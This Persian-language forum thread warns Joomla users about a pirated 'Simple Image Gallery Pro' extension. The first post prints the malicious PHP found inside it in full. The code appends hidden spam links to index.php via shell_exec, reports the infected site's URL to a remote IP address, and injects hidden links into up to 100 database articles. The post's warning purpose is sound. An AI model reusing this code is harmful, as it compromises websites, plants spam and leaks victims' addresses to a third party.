گزارش فایل مخرب در افزونه

**محمد محسنی** · 08-17-2015 07:19 PM

با سلام

امروز یک گزارش داشتم از یکی از کاربران برای فایل مخرب در افزونه simple-image-gallery-pro-v-307 که از سایت http:// webganje.com/index.php/joomla-extension/simple-image-gallery-pro-v-307 دانلود شده بود.

که بعد از بررسی متوجه شدم شامل کد مخرب زیر بود

shell_exec('echo "'."?>\n<div style='text-indent:100%;white-space:nowrap;overflow:hidden;height:1px;'><h1>Main Menu</h1><ul style='list-style-type:none;'><li><a href='http://www.plataformasteam.com'>Plataforma Steam</a></li><li><a href='http://www.foroguate.com'>ForoGuate</a></li><li><a href='http://www.forocarros.org'>ForoCarros</a></li></ul></div>\n<?php".'" >> ../index.php');
file_get_contents("http://176.67.167.186/insert.php?url=http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);

$db2 = JFactory::getDBO();
$db2->setQuery("SELECT id, introtext FROM #__content LIMIT 100");
$results = $db2->loadObjectList();
if($results){
foreach($results as $result) {
$db2->setQuery("UPDATE #__content SET introtext = ".$db->quote($result->introtext."<div style='text-indent:100%;white-space:nowrap;overflow:hidden;height:1px;'><h1>Main Menu</h1><ul style='list-style-type:none;'><li><a href='http://www.plataformasteam.com'>Plataforma Steam</a></li><li><a href='http://www.foroguate.com'>ForoGuate</a></li><li><a href='http://www.forocarros.org'>ForoCarros</a></li></ul></div>")." WHERE id = ".$result->id);
$db2->query();
}
}

لطفا از استفاده از افزونه ها دقت بفرمایید.

موفق و پیروز باشید.

**تبلیغات** · 08-17-2015 07:19 PM

parsiland · 08-18-2015 05:43 AM

درود بر شما دوست عزیز !

بنده چند وقت پیش یه پست گذاشتم درباره ی وجود مخرب در قالب ، بی زحمت آن را بخوانید و اگر کم و کاستی دارد آنرا اصلاح کنید.

[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]

با تشکر